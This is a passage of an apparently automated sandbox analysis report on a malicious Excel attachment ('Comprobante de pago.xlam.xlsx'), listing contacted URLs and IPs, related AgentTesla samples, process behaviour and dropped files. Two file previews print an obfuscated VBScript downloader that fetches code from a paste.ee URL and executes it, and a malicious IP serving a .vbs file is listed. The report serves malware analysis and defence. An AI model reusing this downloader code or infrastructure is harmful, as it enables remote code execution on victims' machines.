                http://ocsp.entrust.net03wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.google.com;wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://analytics.paste.eewscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://drive.google.compowershell.exe, 00000008.00000002.490093448.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://paste.ee/d/KXy1FSwscript.exe, 00000005.00000003.480458856.0000000002DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://drive.google.powershell.exe, 00000008.00000002.489882057.00000000004C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.489882057.00000000004F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.489859803.0000000000360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.000000000269A000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            http://go.microspowershell.exe, 00000008.00000002.490093448.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://paste.ee/d/KXy1Fwscript.exe, 00000005.00000003.481716993.000000000045D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.481855459.000000000045F000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://192.3.216.142/WEDNESDAY-constraints.vbsjEQNEDT32.EXE, 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://drive.usercontent.googleXpowershell.exe, 00000008.00000002.490093448.000000000308B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.google.comwscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://contoso.com/powershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://analytics.paste.ee;wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://drive.google.compowershell.exe, 00000008.00000002.490093448.0000000003060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.000000000269A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://drive.usercontent.google.compowershell.exe, 00000008.00000002.490093448.000000000308B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.00000000027CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://cdnjs.cloudflare.comwscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://cdnjs.cloudflare.com;wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://ocsp.entrust.net0Dwscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.491806655.000000000218F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://secure.comodo.com/CPS0wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://secure.gravatar.comwscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://themes.googleusercontent.comwscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://crl.entrust.net/2048ca.crl0wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://drive.googlepowershell.exe, 00000008.00000002.490093448.0000000003060000.00000004.00000800.00020000.00000000.sdmptrue
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      192.3.216.142
                                                      unknownUnited States
                                                      36352AS-COLOCROSSINGUStrue
                                                      188.114.97.3
                                                      paste.eeEuropean Union
                                                      13335CLOUDFLARENETUStrue
                                                      216.58.212.174
                                                      drive.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      216.58.212.129
                                                      drive.usercontent.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1540839
                                                      Start date and time:2024-10-24 08:54:06 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 7s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:11
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Comprobante de pago.xlam.xlsx
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winXLSX@8/10@4/4
                                                      EGA Information:
                                                      • Successful, ratio: 33.3%
                                                      HCA Information:
                                                      • Successful, ratio: 82%
                                                      • Number of executed functions: 21
                                                      • Number of non-executed functions: 4
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .xlsx
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Active ActiveX Object
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                      • Execution Graph export aborted for target powershell.exe, PID 3832 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 3932 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Comprobante de pago.xlam.xlsx
                                                      TimeTypeDescription
                                                      02:55:50API Interceptor50x Sleep call for process: EQNEDT32.EXE modified
                                                      02:55:53API Interceptor44x Sleep call for process: wscript.exe modified
                                                      02:55:56API Interceptor59x Sleep call for process: powershell.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      192.3.216.142cotizacion.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/madamwebbbas6444444.txt
                                                      Comprobante_swift_8986.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/equitosbasewebbbbbbase644.txt
                                                      03286786476_formulario bancario98.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/madamwebbbas6444444.txt
                                                      solicitud de cotizacion974665687764.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/equitosbasewebbbbbbase644.txt
                                                      03286786476_formulario bancario98.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/madamwebbbas6444444.txt
                                                      solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/equitosbasewebbbbbbase644.txt
                                                      Env#U00edo de Orden de Compra No. 00501.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/vedooooo.txt
                                                      Comprobante_98756.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/equitosbasewebbbbbbase644.txt
                                                      solicitud de cotizacion--98086.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/equitosbasewebbbbbbase644.txt
                                                      03286786476_formulario bancario.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 192.3.216.142/controlfirebase6444.txt
                                                      188.114.97.301YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                      • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                      PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                      • www.freedietbuilder.online/nnla/
                                                      http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                      • onlinecheapflights.net/
                                                      Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                      • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                      • www.ergeneescortg.xyz/guou/
                                                      Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                      • www.thetahostthe.top/9r5x/
                                                      http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                      • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                      SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                      • servicetelemetryserver.shop/api/index.php
                                                      SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                      • servicetelemetryserver.shop/api/index.php
                                                      SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                      • servicetelemetryserver.shop/api/index.php
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      paste.eeOrden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 188.114.96.3
                                                      seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                      • 188.114.97.3
                                                      necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                                      • 188.114.97.3
                                                      BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                      • 188.114.97.3
                                                      DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                      • 188.114.96.3
                                                      20042024150836 14.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 188.114.96.3
                                                      Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                      • 188.114.96.3
                                                      segura.vbsGet hashmaliciousAsyncRATBrowse
                                                      • 188.114.96.3
                                                      DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                      • 188.114.97.3
                                                      20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 188.114.97.3
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSOrden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 188.114.96.3
                                                      VM2ICvV5qQ.pdfGet hashmaliciousUnknownBrowse
                                                      • 104.17.24.14
                                                      EL-25-536_40005512_Le Cuivre_23102024.vbeGet hashmaliciousGuLoaderBrowse
                                                      • 104.21.70.11
                                                      OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.12.205
                                                      PO-008847332.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                      • 104.21.53.112
                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                      • 104.21.53.8
                                                      Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      #PO247762.docxGet hashmaliciousRemcosBrowse
                                                      • 188.114.96.3
                                                      file.exeGet hashmaliciousLummaC, StealcBrowse
                                                      • 172.67.206.204
                                                      AS-COLOCROSSINGUSOrden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 198.46.178.134
                                                      Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                      • 192.3.176.141
                                                      A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                      • 192.210.215.8
                                                      #PO247762.docxGet hashmaliciousRemcosBrowse
                                                      • 104.168.7.51
                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 192.3.165.37
                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 107.175.231.193
                                                      Logs.xlsGet hashmaliciousLokibotBrowse
                                                      • 192.3.176.141
                                                      PRODUCT_INQUIRY.jsGet hashmaliciousWSHRatBrowse
                                                      • 192.210.215.11
                                                      Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                      • 107.175.229.138
                                                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.245.123.45
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      05af1f5ca1b87cc9cc9b25185115607dOrden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      #PO247762.docxGet hashmaliciousRemcosBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      Logs.xlsGet hashmaliciousLokibotBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      oodforme.docGet hashmaliciousRemcosBrowse
                                                      • 216.58.212.174
                                                      • 188.114.97.3
                                                      • 216.58.212.129
                                                      No context
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4760
                                                      Entropy (8bit):4.834060479684549
                                                      Encrypted:false
                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:@...e...........................................................
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):2192
                                                      Entropy (8bit):3.7774756271310084
                                                      Encrypted:false
                                                      SSDEEP:48:22wfI0wGFi8f8f755fQylYX+ZA5fZ1l4Cssm1i:Kzf8f75hQ2YOZABZvrn
                                                      MD5:20FEF4181DA21B2F90C8E83B58043796
                                                      SHA1:F017073EAE191EBC79BCAF455B65121F1DA4CD6A
                                                      SHA-256:1833B9CED1DC0DAC19ABC7095548C90339905DDF221AF0E29BF048CF86191F60
                                                      SHA-512:65DB1A0BC1EE404A1A98FB223801C1CA93256DE1C7619A0AAA8D49B2A2FC49D76F02F9310A6DD6D42ECCFB30E059F531C9EFC61C5A6C50B06DE49026F349C5BB
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:......S.e.t. .f.i.a.d.o.u.r.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).........f.l.a.m.e.n.g.a. .=. .f.r.e.c.h.a.d.a.(."..% ..2 ..' ..1 ..#".).....a.l.e.g.r.e. .=. .f.r.e.c.h.a.d.a.(.".F..% ..2 ..' ..1 ..#1..% ..2 ..' ..1 ..#y..% ..2 ..' ..1 ..#X..% ..2 ..' ..1 ..#K..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#d..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#e..% ..2 ..' ..1 ..#e..% ..2 ..' ..1 ..#...% ..2 ..' ..1 ..#e..% ..2 ..' ..1 ..#t..% ..2 ..' ..1 ..#s..% ..2 ..' ..1 ..#a..% ..2 ..' ..1 ..#p..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#:..% ..2 ..' ..1 ..#p..% ..2 ..' ..1 ..#t..% ..2 ..' ..1 ..#t..% ..2 ..' ..1 ..#h.".).....a.l.e.g.r.e. .=. .R.e.p.l.a.c.e.S.t.r.i.n.g.(.a.l.e.g.r.e.,. .f.l.a.m.e.n.g.a.,. .".".).........f.i.a.d.o.u.r.o...O.p.e.n. .".G.E.T.".,. .a.l.e.g.r.e.,. .F.a.l.s.e.....f.i.a.d.o.u.r.o...S.e.n.d.........E.x.e.c.u.t.e.G.l.o.b.a.l. .f.i.a.d.o.u.r.o...R.e.s.p.o.n.s.e.T.e.x.t.............F.u.n.c.t.i.o.n. .R.e.p.l.a.c.e.S.t.
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):2192
                                                      Entropy (8bit):3.7774756271310084
                                                      Encrypted:false
                                                      SSDEEP:48:22wfI0wGFi8f8f755fQylYX+ZA5fZ1l4Cssm1i:Kzf8f75hQ2YOZABZvrn
                                                      MD5:20FEF4181DA21B2F90C8E83B58043796
                                                      SHA1:F017073EAE191EBC79BCAF455B65121F1DA4CD6A
                                                      SHA-256:1833B9CED1DC0DAC19ABC7095548C90339905DDF221AF0E29BF048CF86191F60
                                                      SHA-512:65DB1A0BC1EE404A1A98FB223801C1CA93256DE1C7619A0AAA8D49B2A2FC49D76F02F9310A6DD6D42ECCFB30E059F531C9EFC61C5A6C50B06DE49026F349C5BB
                                                      Malicious:true
                                                      Preview:......S.e.t. .f.i.a.d.o.u.r.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).........f.l.a.m.e.n.g.a. .=. .f.r.e.c.h.a.d.a.(."..% ..2 ..' ..1 ..#".).....a.l.e.g.r.e. .=. .f.r.e.c.h.a.d.a.(.".F..% ..2 ..' ..1 ..#1..% ..2 ..' ..1 ..#y..% ..2 ..' ..1 ..#X..% ..2 ..' ..1 ..#K..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#d..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#e..% ..2 ..' ..1 ..#e..% ..2 ..' ..1 ..#...% ..2 ..' ..1 ..#e..% ..2 ..' ..1 ..#t..% ..2 ..' ..1 ..#s..% ..2 ..' ..1 ..#a..% ..2 ..' ..1 ..#p..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#/..% ..2 ..' ..1 ..#:..% ..2 ..' ..1 ..#p..% ..2 ..' ..1 ..#t..% ..2 ..' ..1 ..#t..% ..2 ..' ..1 ..#h.".).....a.l.e.g.r.e. .=. .R.e.p.l.a.c.e.S.t.r.i.n.g.(.a.l.e.g.r.e.,. .f.l.a.m.e.n.g.a.,. .".".).........f.i.a.d.o.u.r.o...O.p.e.n. .".G.E.T.".,. .a.l.e.g.r.e.,. .F.a.l.s.e.....f.i.a.d.o.u.r.o...S.e.n.d.........E.x.e.c.u.t.e.G.l.o.b.a.l. .f.i.a.d.o.u.r.o...R.e.s.p.o.n.s.e.T.e.x.t.............F.u.n.c.t.i.o.n. .R.e.p.l.a.c.e.S.t.
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
